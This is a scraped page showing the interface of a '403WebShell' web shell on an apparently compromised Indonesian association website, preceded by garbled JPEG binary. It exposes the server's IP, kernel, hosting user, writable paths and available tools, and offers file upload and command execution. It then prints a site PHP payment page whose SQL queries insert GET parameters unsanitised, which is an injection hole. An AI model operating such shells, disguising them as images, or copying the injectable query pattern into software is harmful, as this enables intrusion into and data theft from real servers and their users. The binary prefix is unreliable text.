JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.222.222.201  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota//d_noniuran.php
<?php include "header.php"; ?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

<?php
$view = isset($_GET['view']) ? $_GET['view'] : null;

switch($view){
	default:
	$nomut=$_GET['nomut'];
	$npm=$_GET['npm'];
	//$kelas="IXA";
	//$nama="Maudi Ayunda";
	
	
	?>

	<div class="container">

		
				
				
<h3 align="center">DATA Pembayaran Invoice </h3>

<div class="table-container"></div>
<div class="panel-body">

<div class="">
<table class="demo-table responsive" >

<caption class="title">Tabel Pembayaran </caption>
<thead>
	<tr>
		<th scope="col">No</th>
		<th scope="col">Kode</th>
		<th scope="col">Jenis Tagihan</th>
		<th scope="col">Nominal</th>

		

	</tr>
</thead>
	<?php
	$sql = mysqli_query($konek, "SELECT * FROM noniuran where kd_tag='1' ");
	//  $sql = mysqli_query($konek, "select tblnonspp.*,nonspp.bayar from nonspp INNER JOIN tblnonspp ON nonspp.kelas= tblnonspp.kelas group by jenis_tagihan");
	
	$no=1;
	$total =0;
	$jumlah = 0;
	while($d=mysqli_fetch_array($sql)){
		 $harga = number_format($d['nominal'],0,",",".");
		echo "<tr>
			<td data-header='No' class='title'>$no</td>
			<td data-header='Kode' >$d[kd_tag]</td>
			<td data-header='jenis Tagihan' >$d[j_tagihan]</td>
			<td align=right data-header='Nominal'>Rp. $harga</td>			

			
		</tr>";
		
		//$jumlah2 = isset($d['nominal']) ? $d['nominal'] : '';
					
		//$jumlah[] = $d['nominal'];
		//$npm = $d['npm'];
			$jumlah+= $d['nominal'];
		$no++;
	}	
	


								
						//$gtjumlahnya = array_sum($jumlah);
						$gtjumlahnya =($jumlah);
						function rupiah($subjumlah){
						$hasil_rupiah = "Rp " . number_format($subjumlah,2,',','.');
						return $hasil_rupiah;}
								
					
//$harga = array_sum($harga);

//Tampilkan

			echo "<td>";
                   	echo "";
					
					 echo "";
					echo "<td>";
					echo "<td>";

                     echo "Total ";
					 echo "<td>";

					echo "<align=right td>";
				
					
		//			echo "<td> <a class='btn btn-danger btn-sm' href='prosesnon.php?act=bayar&total=$jumlahnya&npm=$npm&kelas=$kelas'>Bayar tagihan</a></td>";

			echo "</td>
      </tr>";
	  
	  
	?>	  
</table>
<?php
}
?>
</div>



<div class="">
<div class="panel-body">
					<table width="" class="demo-table responsive" >
					<table class="table table-bordered table-striped">
					<table class="demo-table responsive">
					<caption class="title">Data Pembayaran Non Iuran</caption>
					<thead>
						<tr>
							<th scope="col">No</th>
							<th scope="col">No Inv</th>
							<th scope="col">jumlah total</th>

							<th scope="col">Status</th>
							<th scope="col">Bukti Transfer</th>
							<th scope="col">-</th>
							<th scope="col">-</th>
							<th scope="col">Action</th>
							
					
						</tr>
					</thead>
						<?php
						//  $sql = mysqli_query($konek, "select * from nonspp WHERE tahunajaran='$tahun' and tkelas='$tkelas' AND npm='$nis' group by idnonspp");
						  $sql = mysqli_query($konek, "select * from b_noniu where validasi ='' AND  npm='$_GET[npm]' AND  nomut='$nomut' ");
						$no=1;
						$total =0;
						$bayar =0;
						$totalb =0;
						
						while($d=mysqli_fetch_array($sql)){
							 $bayartb = number_format($d['bayar'],0,",",".");
							 // $harga = number_format($d['nominal'],0,",",".");
							echo "<tr>
							<td data-header='No' class='title'>$no</td>
							<td data-header='No Invoice' >$d[noinv]</td>

							<td align=right data-header='Jumlah'>$d[nominal]</td>
							<td data-header='Status bayar' align='center'>";
											if($d['status']==''){
									echo "Belum bayar";
								}else{			
									
									 echo $d['status'];
								}
							echo "</td>
			

			
			<td data-header='Bukti Trans' align='center'>";
			if($d['gambar']==''){
					echo "-";
			}else{		
			echo "<img src=../files/$d[gambar] width='100' height='126'> ";
				}
			echo "</td>
			
		</tr>";
							//$bayar[] = $d['bayar'];
							//$totalb[] = $d['nominal'];
							$bayar += $d['bayar'];
							$totalb += $d['nominal'];
							$npm=$d['npm'];
							$status=$d['status'];
							$id=$d['id_tagihan'];

							//$bayar = $d['bayar'];
							$no++;
						}
						
						//$bayarnya = ($bayar);	
						//$totalnya = ($totalb);
						$sisa = $totalb - $bayar ;
					
					//Tampilkan
					
								echo "<td>";
										echo "";
										echo "<td>";

										echo "Grand Total  ";
										echo "<td>";
										echo rupiah($totalb);
										echo "<td>";
										
										
										echo "<td>";
										echo "Sisa Bayar : ";
										echo "<td text-align='right'>";
										echo rupiah($sisa);
								echo "<td>";
									echo "<td  data-header='Bayar' align='center'>";
									if($sisa<='0'){
									
								echo "-";
										}else{							
		 echo  "<a class='btn btn-danger btn-sm' href='bmut.php?npm=$npm&act=bayar&idnonspp=$id&npm=$npm'>Bayar tagihan</a>";
											}
									echo "</td>";
								echo "</td>
						  </tr>";
					
					
					
						?>	  
					</table>
					<br>
</div>
<?php

?>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit